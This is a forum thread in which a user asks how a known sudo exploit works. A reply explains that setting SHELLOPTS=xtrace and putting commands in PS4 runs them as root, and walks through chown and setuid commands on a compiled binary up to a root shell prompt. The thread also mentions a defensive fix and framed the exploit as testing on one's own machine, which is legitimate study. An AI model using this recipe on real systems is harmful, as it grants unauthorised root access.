# please help me undestrand this expploit for sudo :P

## dinsmore

hi

i need to test this exploit on my machine:

http://www.securiteam.com/exploits/6R00E00EKU.html

but i can't seem to understand what is it doing when setting the envirorment options SHELLOPTS and PS4....      is the x.sh script supposed to execute the commands set into those env variables??

also, i'm guessing that i'm not supposed to have write permissions on the x.sh script, otherwise it would be stupid to setenv instead of just writing the commands into the script...

i don't know much about csh, only that it's a C like shell with simmilar sintax maybe....

any help here?

thnx !

----------

## timeBandit

SHELLOPTS=xtrace turns on script tracing, equivalent to set -x in bash. The PS4 prompt string is the prompt echoed when tracing is on. Per the Bash manual: *Quote:*   

> PS4
> 
>     The value is the prompt printed before the command line is echoed when the `-x' option is set (see section 4.3 The Set Builtin). The first character of PS4 is replicated multiple times, as necessary, to indicate multiple levels of indirection. The default is `+ '.

 The same applies to csh (as evidenced by the viability of this exploit).

The exploit requires access to a user who can execute any shell script with root privileges via sudo. The x.sh script is merely an example. When tracing is on, the user's shell evaluates and echoes the PS4 prompt string before each command in the script. However, since the script is run via sudo the shell evaluates PS4 as root. Thus the attacker can inject arbitrary commands (via PS4) into the execution environment of the script, without actually modifying the script.

Following the example:

```
gcc -o egg egg.c

% setenv SHELLOPTS xtrace

% setenv PS4 '$(chown root:root egg)'

% sudo ./x.sh

echo Getting root!!

Getting root!!

% ls -lisa egg

1198941 8 -rwxr-xr-x 1 root root 7428 2005-11-09 13:54 egg

```

The above compiles a small program that simply launches a shell, then uses the sudo exploit to give root ownership of the executable. The command in PS4 is executed immediately before the shell prints "echo Getting root!!" (because tracing is on).

```
% setenv PS4 '$(chmod +s egg)'

% sudo ./x.sh

echo Getting root!!

Getting root!!
```

Use the exploit again to run another command as root, this time setting the setuid bit on the executable. Now egg will run as root.

```
% ./egg

sh-3.00# id

uid=0(root) gid=1000(breno) egid=0(root) grupos=7(lp),102(lpadmin),1000(breno)
```

Run egg and hey-presto: you have a root shell.  :Shocked: 

 :Idea:  /me sends myself a note to check sudo versions and add "set +x" to my (mercifully few) setuid-root scripts when I get home.  :Embarassed: 

----------

## dinsmore

that's what i thought, but doing exactly as the description says, it didn't work for me.....  Why does the script call bash if we're running from CSH?? will it execute the commands on the ps4 env from csh??

when i run the x.sh with sudo, it doesn't changes egg ownership.....

----------

## dinsmore

the exploit description says vulnerable versions to be <1.6.8p10.     I have 1.6.8p9..........maybe i should try an older version since they are pretty close.

Does that sound reasonable?

----------

## timeBandit

 *dinsmore wrote:*   

> Why does the script call bash if we're running from CSH?? will it execute the commands on the ps4 env from csh??

 It doesn't, I cited the Bash manaual as a reference for PS4 because I had it handy. PS1-PS4 are POSIX variables AFAIK (meaning they're the same for csh and Bash).

As for why it doesn't work for you, perhaps csh was patched to close this hole? I've no idea. csh makes my head hurt. I had the same version of sudo as you but upgraded over the weekend. I can no longer reproduce the experiment.

----------

## dinsmore

ahm, then why does the x.sh example script starts with

#!/bin/bash -x

??

i found my sudo to be blocking env variables such as PS4. you can see this by typing "sudo -V" as root...    I edited the sudoers config file to change this, but sudo keeps the same behaviour..   :S

----------

## dinsmore

 :Very Happy:  :Very Happy: 

i installed an older version of sudo which didn't block those variables, so, it worked  :Very Happy:  niiice

tnx for the help.....

peace out! lol

##EDIT##

btw, nice ken pic    :Wink: 

----------

## timeBandit

 *dinsmore wrote:*   

> ahm, then why does the x.sh example script starts with
> 
> #!/bin/bash -x

 Because I have a large blind spot that obscured the first line of the script.   :Embarassed:  :Very Happy: 

Apologies, I locked on to the use of csh in the example and didn't think it through. I told you csh makes my head hurt.   :Very Happy: 

Glad I could help, and thanks for noticing CK!

----------

## dinsmore

i was wondering....   where did you get that ken pic? i've been searching for info about ken to see if i can get it for linux, but i can't seem to find any info or pics....     (i'm assuming that pic is from the  ken pc game...   i used to play it for dos  lol)

..    :Razz: 

 :Smile: 

----------

## timeBandit

 *dinsmore wrote:*   

> i was wondering.... where did you get that ken pic?

 I GIMPed a screen shot from the DOS game.   :Smile: 

----------

